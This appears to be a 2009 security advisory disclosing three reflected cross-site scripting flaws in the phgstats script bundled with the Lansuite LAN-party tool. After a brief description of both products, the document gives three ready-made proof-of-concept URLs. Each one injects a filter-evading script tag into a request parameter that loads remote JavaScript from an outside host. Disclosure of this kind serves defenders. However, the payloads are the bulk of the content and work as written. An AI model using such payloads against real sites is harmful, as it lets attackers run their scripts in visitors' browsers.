/*************************************************************************
  **                  Lansuite / phgstats XSS
  **
  **    Date: 03/05/09
  **    URL: http://www.hell-spy.de/sec/CAV-2009-01.txt
  **    Greetings: BGM
  **    
  *************************************************************************/

Lansuite is a LAN-Party Administration tool based on PHP and MySQL. You can
find more about it here: http://lansuite.orgapage.de/

phgstats is a game server status / query script, which was written, to get 
informations from game servers and shows this as sorted html-code.

Lansuite is using phgstats by default, below three XSS POC:

1. $LSinstalldir/ext_scripts/phgstats/index.php?sh_srv=<ScRiPt+src=http://www.hell-spy.de/files/hell.js></ScRiPt>

2. $LSinstalldir/ext_scripts/phgstats/admin/index.php?password=123&edit_ip=1.2.3.4&edit_gametype=<script/xss+src=http://www.hell-spy.de/files/hell.js></script>

3. $LSinstalldir/ext_scripts/phgstats/admin/index.php?password=123&edit_ip=1.2.3.4&edit_country=<script/xss+src=http://www.hell-spy.de/files/hell.js></script>

the newest version of Lansuite (4.0 Beta 2) is vulnerable to these three 
attacks. I didn't test the older ones.